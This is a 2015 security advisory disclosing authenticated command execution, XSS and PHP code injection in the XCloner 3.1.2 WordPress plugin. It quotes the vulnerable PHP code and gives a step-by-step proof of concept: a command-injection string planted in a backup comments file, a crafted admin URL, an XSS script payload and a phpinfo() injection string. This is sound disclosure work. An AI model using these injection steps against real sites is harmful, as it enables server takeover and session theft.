Advisory #: 121
Title: Xcloner v3.1.2 wordpress plugin authenticated command execution and XSS
Author: Larry W. Cashdollar, @_larry0
Date: 2015-05-10
CWE: CWE-77 Command Injection
Download Site:
Vendor: Ovidiu Liuta, @thinkovi
Vendor Notified: 2015-07-16
Vendor Contact: @thinkovi
Description: XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!
Lines 1129 of 1135 in cloner.functions.php 1129 $excluded_cmd = ""; 1130 if ($fp = @fopen($_REQUEST['excl_manual'], "r")) { 1131 while (!feof($fp)) 1132 $excluded_cmd .= fread($fp, 1024); 1133 1134 fclose($fp); 1135 } Line 1205: If configured for manual mode the contents of $excluded_cmd are passed to exec(); 1205 exec($_CONFIG[tarpath] . " $excluded_cmd ". $_CONFIG['tarcompress'] ."vf $backup_file update $file"); We need to supply a file with a list of commands to execute in it, we can create this via the backup comments feature. It creates a file under administrator/backups/.comments with whatever you want in it. Like ;id>/tmp/w00t; Then change the configuration to manual backup by selecting the radio button and perform a backup. Hit this link: http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=300&lines=6204&backup=backup_20150511_ 2028_sqlnodrop.tar&excl_manual=/usr/share/wordpress/administrator/backups/.comments In a shell: $ cat /tmp/w00t uid=33(wwwdata) gid=33(wwwdata) groups=33(wwwdata) Also $excluded_cmd is XSS http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_cloner&task=refresh&json=0&startf=800&lines=6204&backup=backup_20150511_ 2028_sqlnodrop.tar&excl_manual='><script>alert('w00t');</script> Chrome XSS alert: The XSS Auditor refused to execute a script in 'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_…lnodrop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'XXSSProtection' nor 'ContentSecurityPolicy' header. plugins.php:403 The XSS Auditor refused to execute a script in 'http://www.vapidlabs.internal/wpadmin/plugins.php?page=xcloner_show&option=com_…lno drop.tar&excl_manual=%27%3E%3Cscript%3Ealert(%27w00t%27);%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'XXSSProtection' nor 'ContentSecurityPolicy' header. The default template has an error with the LM_LOGIN_TEXT field so just clean that out or you will get a syntax error when trying to execute. Adding foo');phpinfo();define('foo to the Translation LM_FRONT_* fields then browsing to language/italian.php you will execute phpinfo();. CVE-2015-4336 Remote Code Exec CVE-2015-4337 XSS in $excluded_cmd CVE-2015-4338 php code Injection
Exploit Code:
Screen Shots: [xcloner2-1.png][xcloner2-2.png][mitre-email.txt]